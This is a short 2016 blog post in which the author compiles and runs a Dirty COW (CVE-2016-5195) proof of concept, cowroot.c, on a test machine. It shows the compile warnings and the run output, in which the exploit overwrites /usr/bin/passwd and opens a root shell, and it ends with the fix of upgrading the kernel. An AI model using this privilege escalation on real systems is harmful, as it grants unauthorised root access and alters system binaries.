CVE 2016-5195 dirtycow

Posted on 11 Dec 2016 in security • 2 min read

Ðirtycow logo

Dirty COW (CVE-2016-5195) is a privilege escalation vulnerability in the Linux Kernel. "A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system." (Source: Red Hat)

So globally with the write code doing the right thing a unprivileged user can get root permission on most GNU/Linux systems. The satiric web site was in the first time create to make fun of people giving name to vulnerability even a youtube video was made. Nevertheless the wiki of the website (on github) link to a few PoCs.

I test one of this PoCs on my test computer. The exploits were not fully stable at the time an my computer was sometime friezing just after getting root privileges.

I used a modified version of the cowroot.c PoCs host on a gist. First of all we compile the exploit code:

[maggick@computer_name dirtycow]$ gcc cowroot.c -o cowroot -pthread
cowroot.c: In function ‘procselfmemThread’:
cowroot.c:107:17: warning: passing argument 2 of ‘lseek’ makes integer from pointer without a cast [-Wint-conversion]
In file included from cowroot.c:27:0:
/usr/include/unistd.h:337:16: note: expected ‘__off_t {aka long int}’ but argument is of type ‘void *’
 extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
cowroot.c: In function ‘main’:
cowroot.c:144:5: warning: implicit declaration of function ‘asprintf’ [-Wimplicit-function-declaration]
     asprintf(&backup, "cp %s /tmp/bak", suid_binary);
cowroot.c:148:5: warning: implicit declaration of function ‘fstat’ [-Wimplicit-function-declaration]

The warning are not really important after the compilation we just launch the exploit:

[maggick@computer_name dirtycow]$ ./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 47224
Racing, this may take a while..
/usr/bin/passwd overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped
thread stopped
[root@computer_name dirtycow]# id
uid=0(root) gid=1000(maggick) groups=1000(maggick)

And we got root privileges as planned. The exploit replace the /usr/bin/passwd executable so we need to restore it with the one in /tmp/bak.

In order to correct this vulnerability we just need to upgrade our kernel.